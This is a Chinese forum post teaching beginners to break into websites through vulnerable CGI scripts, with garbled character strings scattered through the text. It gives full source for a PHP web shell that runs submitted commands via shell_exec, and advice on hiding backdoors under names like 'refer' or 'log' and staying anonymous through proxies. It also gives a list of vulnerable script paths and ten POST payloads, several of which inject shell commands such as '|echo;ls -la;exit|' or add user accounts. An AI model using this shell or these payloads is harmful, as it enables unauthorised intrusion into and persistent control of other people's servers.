CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
大家好 我是bboyhip  只是一名菜菜的exploiter
很开心来到贵论坛
这里让我感觉 很有技术交流的感觉
我会长长来玩的
6 v# M% }- @) @前言:
% z$ i/ w) C2 N1 e; f0 n以下讲解针对欧美日本网站
當我們在做滲透分析的時候 方法有很多
我门都知道 国外伺服器大多是linux 平台
所以有很多网站程序有6成都会使用cgi 脚本来管理
$ ~' i  ]: N+ Y: ~4 J目录为/cgi-bin/
; B1 V. o5 p- I, }1 R
" f, g# o7 V+ M  E% m0 v" F只是个人在实务上一些经验
$ A* ^: Q  V$ @/ `" t- U0 n" F* S* v2 y写的不好 请多多见谅喔
- \. b+ _) m: g. q4 ]( K/ s在这里我简单分为几个部份一定要會的
讲解一下
让没有基础的人很容易上手
4 R3 |7 X% e: e0 I. y+ x* T. g
以下内容跟帖回复才能看到
& W' Z. c/ d& P) u: ]- C==============================
9 Q  U) f- X5 o8 R) m
7 ]* o) V; `" z第1部份: 何谓Shell?
3 [: J) g& H6 C$ IShell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
A shell is the program which reads user input from the command line and executes actions based upon that input.
6 j5 y, a; ^) T2 S; a) [" f# b$ a0 d$ U意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.
" G0 n* s; @: Y7 R
& N" F2 K0 j  C# _: f对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
6 ~* Q9 D, }5 z2 k# M所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.
# `+ d+ I1 y6 V1 x
/ q" n0 X8 i! Q' O. @第2部份: Unix 指令
以下是一些常见及重要的指令:
pwd: 显示当前目录, 即是後门/程式所在的位置
) K, W, d. c, d如 /home/www/site.com/cgi-bin/
ls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
ls -al :详细列出档案资料(当前目录)
ls /: 列出根目录
ls /etc: 列出/etc的资料夹及档案
ls ../ -al: 详细列出上一层的资料夹及档案
0 h0 G- d; g. T( scat: 显示档案内容
" x; a" I9 x4 u1 Jcat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
cat /etc/passwd: 显示 /etc/passwd 这个档案的内容
1 s; w. i9 n" O, f7 @* bwho: 显示谁login 至系统
( q5 V) Q3 v* ]6 y, Hman: 显示指令用法  
; L* D2 c( A' bman ls: 显示ls这指令的用法  
: g/ M, T+ c- I9 p0 n6 d6 Dmkdir 建立目录
' I& C, j& m- d$ @% ~' Nrmdir 删除目录
9 S1 t/ }0 t9 M; L+ i0 r* Mmv 移动档案
rm 删除档案
7 E, v! @+ B+ P: A0 V/ g1 n# R
第3部份: Shell的使用
例如:
http://site.com/refer.php
1 _4 J' x  w. f% B1 Q这是我的後门, 原代码如下:
<Form Action="#" Method="POST">
<Input type="text" name="cmd">
<Input type="Submit">
</Form>
2 S" V$ `) Z4 S4 x3 X) }' e<?php
( e" O, P2 q3 ^5 G: U6 M$cmd = $_POST['cmd'];
$Output = shell_exec($cmd);
echo $Output;
# v+ {( U% y6 K9 {  `6 @?>
- f# ?0 |1 R' L1 c输入pwd, 可得到绝对路径:
; K6 ?, g( Q3 q% Q/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com

; u0 `+ H1 h4 w( b3 w第4部份: 注意事项
; x5 f) k) N3 w6 H" x; R- 使用匿名代理, 保障自己
3 r) W: n6 H6 s. y$ R* d- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
8 T! O9 F' n( g) i6 n( [- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
8 d1 y% C" A, _0 A4 l- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
# Y% ~# C" [& D. j6 J6 ]4 g- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
不容易被发现.
- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
8 o/ V9 g$ L" H% b; {9 {+ h针对网站的渗透分析方法太多了
3 q% `$ e$ n' T5 k7 Z7 n/ J这篇文章的重点是cgi 脚本攻击
所以我用简单的叙述形容
开始讲解脚本入侵过程:
在这里提供一些方法思路让大家学习一下
- J. N8 A: k4 k* J6 l' @
0 O$ }. e/ B. J/ ^8 `; P3 V1.一开始对一个网站进行cgi漏洞扫描
我们需要的东西有
扫洞工具 如:triton..等等
( ]% z: ~& z) v/ @/ b% s7 L, iE表
如
/cgi-bin/add-passwd.cgi
( h& z* V: B8 |" _5 `$ y) d* s/WebShop/templates/cc.txt
/Admin_files/order.log
/orders/mountain.cfg
/cgi-sys/cart.pl
3 Q, u! F. ?( I/ C! U/scripts/cart.pl
/htbin/cart.pl
- Y, s4 A, p. m( g/ U8 x% q- P, aE表来源可以是网路收寻或是自己的0 day

6 {* |* x, E9 G- ~0 |% d* Y2.怎样确认扫到的洞 是真的还假的?
举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
& G4 N9 w* ?8 `9 R! c+ @: O一般都是在IE里先看一下的,记住这个返回码哦
ERROR:This script should be referenced with a METHOD of POST.
没有返回一定是假的
  |) R. L8 M# }! x- _; t' s; p3 U3.重来来了 很多人都会问我
他扫到很多洞 但是不会使用
, }0 P' L5 s. l' n7 P) t因为这些漏洞 使用的语法 称为post
9 z% X2 N: {. `: O3 a/ n* q9 M我们要找post 的方法很多
可以是源代码分析 找出介质
% k9 V; x. P5 \5 d& m2 @& r或是用抓包工具 抓他的语法...等等

2 w8 H- a9 Y' P8 W: p, |7 c以下我提供10个 cgi 洞以及使用方法post
5 n, o/ J4 l$ K. ~8 _" O6 d让大家可以针对网站去做扫描  
) J3 S% b1 T& o. P( p/index.cgi
9 q% w9 Q3 o+ e  Cwei=ren&gen=command
/passmaster.cgi
Action=Add&Username=Username&Password=Password
+ f  f( V: x9 I5 o/accountcreate.cgi
+ E$ \* v0 x: G7 r* D6 ?username=username&password=password&ref1=|echo;ls|
! ^4 R' {" n4 z! X% f/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
2 M% g+ x% _/ E; d/ccbill-local.asp
post_values=username:password
/count.cgi
pinfile=|echo;ls -la;exit|
: G3 U: `* o  @! |5 L5 Y/recon.cgi
2 J, g" n! v0 T  @, p# D5 W/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
8 v5 ], o6 X5 Z1 y" c+ c/af.cgi_browser_out=|echo;ls -la;exit;|
% c0 Z. E1 w, w
0 T2 q8 g% y$ q今天就讲到这  感谢大家支持
: j! u* x3 c  _* @